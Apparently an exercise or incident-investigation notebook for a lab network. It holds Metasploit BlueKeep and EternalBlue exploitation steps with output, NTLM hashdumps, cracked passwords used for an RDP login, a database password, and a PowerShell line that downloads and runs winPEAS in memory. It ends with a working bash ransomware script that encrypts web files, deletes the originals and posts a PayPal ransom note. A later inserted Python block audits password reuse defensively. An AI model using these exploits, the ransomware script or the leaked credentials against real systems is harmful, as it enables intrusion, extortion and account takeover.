admin:$6$g.7PD1hmRs69HVHL$h/.STarcTEGBMGL4grwdgMm2gMBLj12xWRgm/Vu1p5uJObiImx3aYPyyAGK5O7nYQ.GEKr/xskRhEf5ZkXd4t1:19060:0:99999:7:::
```
```
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts = 10.11.4.8/239.5/10.11.240.14
set target 1
exploit
```
Password for admin:
```bash
hashcat -m 1800 -a 0 hashes.hash rockyou7.txt
> $6$g.7PD1hmRs69HVHL$h/.STarcTEGBMGL4grwdgMm2gMBLj12xWRgm/Vu1p5uJObiImx3aYPyyAGK5O7nYQ.GEKr/xskRhEf5ZkXd4t1:Destiny1
```
```bash
ssh admin@10.11.2.11
admin@10.11.2.11's password:
Oh! Hello there! You've been infected by GachiRansom, send 300$ to paypal:b.harrington@gmail.com to get your unecnryption key.
```
```bash
root@elto-portal2:~# cat .nano_history
DumpIOInput
554
New user added to the system
syslog
Include
edit-pass
edit-sub
myFu
home?des
User
Redir
exa
goo
google.com
ASD
ya.
RewriteBase /
Rewrite
Base
RewriteEngine
examp
ya.ru
.git
index.php
Creat
Create Content
Unknown problem somewhere in the
Non standard syslog message (siz
$InputFilePollInterval
Polling
$SystemLogRateLimitBurst
evil
```
`find / -newermt "2022-03-5" -not -path "/proc/*" -not -path "/sys/*" -not -path "/dev/*" -not -path "/run/*"`
Attacker - 10.11.200.50
# Interesting files:
/var/backups/shadow.bak - not true
/root/.*_history
/home/*/.*_history
# Trash
```sql
create database drupal;
grant all privileges on drupal.* to drupaluser@localhost identified by 'DruP@ss531';
flush privileges;
drop database drupal;
create database drupal;
grant all privileges on drupal.* to drupaluser@localhost identified by 'DruP@ss531';
flush privileges;
```
```
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data
| 1 | admin | $S$DrjhY9H/SDz7/hZ4sJp2KiQWx3/ldBEFaCJQK0DUyRRyeHR6W3zw | svc-cyber-mail@rt-solar.ru | | | NULL | 1595325583 | 1595579787 | 1595579787 | 1 | Europe/Moscow | | 0 | svc-cyber-mail@rt-solar.ru | a:1:{s:17:"mimemail_textonly";i:0;} |
| 4 | user1 | $S$DCWEfhlKrg8bKCI9TJSn7hVyjp05ktwnM6KlHC4wRE0scj1CBbaN | user1@server.example | | | panopoly_wysiwyg_text | 1595327058 | 1606263319 | 1606263319 | 1 | Europe/Moscow | | 0 | user1@server.example | a:2:{s:17:"mimemail_textonly";i:0;s:18:"htmlmail_plaintext";i:0;} |
```
# Eternalblue:
```
rhosts => 10.11.2.12
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.11.2.12:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.11.2.12:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
```
rhosts => 10.11.4.8
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.11.4.8:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.11.4.8:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
```
rhosts => 10.11.239.5
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.11.239.5:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.11.239.5:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.11.239.6
rhosts => 10.11.239.6
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.11.239.6:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.11.239.6:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
```
rhosts => 10.11.240.14
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.11.240.14:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.11.240.14:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
```msf
use exploit/windows/smb/ms17_010_eternalblue
```
host | res | hashes
:-:|:-:|:-:
10.11.2.12|Server username: NT AUTHORITY\система|
10.11.4.8|Server username: NT AUTHORITY\система|
10.11.239.5|Server username: NT AUTHORITY\система|
10.11.239.6|Server username: NT AUTHORITY\система|
10.11.240.14||
10.11.2.12:
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/hashdump
msf6 post(windows/gather/hashdump) > set session 2
session => 2
msf6 post(windows/gather/hashdump) > run
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 791b05821400438629a2a79f2923fa52...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
cadm:";)"
[*] Dumping password hashes...
Администратор:500:aad3b435b51404eeaad3b435b51404ee:4c24dc6d6c75dee89c887b44a02285ee:::
Гость:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cadm:1000:aad3b435b51404eeaad3b435b51404ee:3e3b78359fdb827d5d348b7b923f4e55:::
[*] Post module execution completed
```
# MSF instruction
```bash
sudo msfdb_init
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set rhosts <ip>
run
```
https://www.hacking-tutorial.com/hacking-tutorial/5-steps-to-enable-remote-desktop-using-metasploit-meterpreter/#sthash.PkPFFSLt.dpbs
administrators_authorized_keys
```powershell
powershell
$url = "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
[Net.ServicePointManager]::SecurityProtocol = "tls12, tls11, tls"
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content));
[winPEAS.Program]::Main("log=./winpeas.log")
```
Linux version 3.16.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.8.4 (Debian 4.8.4-1) ) #1 SMP Debian 3.16.7-ckt9-2 (2015-04-13)
```
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
10.11.2.12 445/tcp (smb) Администратор Blank password
10.11.2.12 10.11.2.12 445/tcp (smb) Администратор aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm
10.11.2.12 445/tcp (smb) Гость Blank password
10.11.2.12 10.11.2.12 445/tcp (smb) Гость aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm
10.11.2.12 10.11.2.12 445/tcp (smb) cadm aad3b435b51404eeaad3b435b51404ee:3e3b78359fdb827d5d348b7b923f4e55 NTLM hash nt,lm
10.11.239.5 10.11.239.5 445/tcp (smb) Администратор aad3b435b51404eeaad3b435b51404ee:4c24dc6d6c75dee89c887b44a02285ee NTLM hash nt,lm
10.11.239.5 10.11.2.12 445/tcp (smb) Гость aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm
10.11.239.5 10.11.2.12 445/tcp (smb) cadm aad3b435b51404eeaad3b435b51404ee:3e3b78359fdb827d5d348b7b923f4e55 NTLM hash nt,lm
10.11.239.5 10.11.239.5 445/tcp (smb) oper aad3b435b51404eeaad3b435b51404ee:b59607640885d9c51c5a85a5126c9551 NTLM hash nt,lm
10.11.239.6 10.11.239.5 445/tcp (smb) Администратор aad3b435b51404eeaad3b435b51404ee:4c24dc6d6c75dee89c887b44a02285ee NTLM hash nt,lm
10.11.239.6 10.11.2.12 445/tcp (smb) Гость aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm
10.11.239.6 10.11.2.12 445/tcp (smb) cadm aad3b435b51404eeaad3b435b51404ee:3e3b78359fdb827d5d348b7b923f4e55 NTLM hash nt,lm
10.11.239.6 10.11.239.5 445/tcp (smb) oper aad3b435b51404eeaad3b435b51404ee:b59607640885d9c51c5a85a5126c9551 NTLM hash nt,lm
10.11.240.14 10.11.2.12 445/tcp (smb) Администратор aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm
10.11.240.14 10.11.2.12 445/tcp (smb) Гость aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash nt,lm
10.11.240.14 10.11.2.12 445/tcp (smb) cadm aad3b435b51404eeaad3b435b51404ee:3e3b78359fdb827d5d348b7b923f4e55 NTLM hash nt,lm
```
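The credentials listing above shows the same NT hashes for Администратор and cadm turning up on several hosts, and a blank Администратор hash on 10.11.240.14: local-account password reuse is what turns one compromised machine into all of them. As an added example (not from these notes and not Metasploit code), the Python below audits pwdump-style `user:RID:LM:NT:::` lines collected per host for non-empty NT hashes shared across hosts, empty passwords on anything other than Guest, and leftover LM hashes. The sample data is constructed from the hashes already shown here, with English account names; the constants and function names are the example's own.

```python
"""Added example (not from the original notes): audit pwdump-style hash
listings from several hosts for shared local-account passwords, empty
passwords and stored LM hashes. SAMPLE_DUMPS is constructed from the hashes
already shown in these notes."""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# host -> pwdump lines (user:RID:LM:NT:::) as a hashdump prints them (constructed)
SAMPLE_DUMPS: Dict[str, str] = {
    "10.11.2.12": """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4c24dc6d6c75dee89c887b44a02285ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cadm:1000:aad3b435b51404eeaad3b435b51404ee:3e3b78359fdb827d5d348b7b923f4e55:::
""",
    "10.11.239.5": """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4c24dc6d6c75dee89c887b44a02285ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cadm:1000:aad3b435b51404eeaad3b435b51404ee:3e3b78359fdb827d5d348b7b923f4e55:::
oper:1001:aad3b435b51404eeaad3b435b51404ee:b59607640885d9c51c5a85a5126c9551:::
""",
    "10.11.240.14": """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
""",
}

PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::")


def parse_pwdump(text: str) -> List[Tuple[str, int, str, str]]:
    """Return (user, rid, lm, nt) tuples; lines that are not pwdump records are skipped."""
    rows = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if m:
            rows.append((m.group(1), int(m.group(2)), m.group(3).lower(), m.group(4).lower()))
    return rows


def audit(dumps: Dict[str, str]) -> List[str]:
    """Per-host checks first, then cross-host reuse of the same NT hash."""
    out: List[str] = []
    hosts_by_nt: Dict[str, set] = defaultdict(set)
    users_by_nt: Dict[str, set] = defaultdict(set)
    for host, text in sorted(dumps.items()):
        for user, rid, lm, nt in parse_pwdump(text):
            if lm != EMPTY_LM:
                out.append(f"{host}: {user} has an LM hash stored; disable LM hash storage")
            if nt == EMPTY_NT and rid != 501:  # a disabled Guest with a blank NT hash is normal
                out.append(f"{host}: {user} (RID {rid}) has an empty password")
            elif nt != EMPTY_NT:
                hosts_by_nt[nt].add(host)
                users_by_nt[nt].add(user)
    for nt in sorted(hosts_by_nt):
        hosts = sorted(hosts_by_nt[nt])
        if len(hosts) > 1:  # one password for the same local account everywhere
            out.append(f"NT hash {nt} ({', '.join(sorted(users_by_nt[nt]))}) shared across "
                       f"{len(hosts)} hosts: {', '.join(hosts)}; set unique local passwords (LAPS)")
    return out
```

The shared-hash check is the one that matters for containment: each hash reported as shared is a set of machines that fall together, so those are the accounts to randomise first.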
# new
```
Администратор:500:aad3b435b51404eeaad3b435b51404ee:4c24dc6d6c75dee89c887b44a02285ee:::Maggie1
oper:1001:aad3b435b51404eeaad3b435b51404ee:b59607640885d9c51c5a85a5126c9551:::Stephanie1
```
```
rdesktop -u Администратор -p Maggie1 10.11.239.5
```
c:/ransom.ps1
4.13 - borisov - enggeneral
10.11.4.10:/документы/11password.zip
https://dropmefiles.com/A2yjV
```bash
#!/bin/bash
iv=`cat /dev/urandom | tr -cd 'A-F0-9' | head -c 32`
pass=`cat /dev/urandom | tr -cd 'A-F0-9' | head -c 10`
dirwalk=/var/www/html
files=`find $dirwalk -maxdepth 1 -type f | grep -P ".php$|FLAG.txt$"`
for f in $files
do
outfile=$f.encr
openssl enc -aes-256-cbc -a -salt -in $f -out $outfile -pass pass:$pass -iv $iv
rm $f
done
echo "Oh! Hello there! You've been infected by GachiRansom, send 300$ to paypal:b.harrington@gmail.com to get your unecnryption key." | wall
echo "Oh! Hello there! You've been infected by GachiRansom, send 300$ to paypal:b.harrington@gmail.com to get your unecnryption key." > /etc/motd
exit 0
```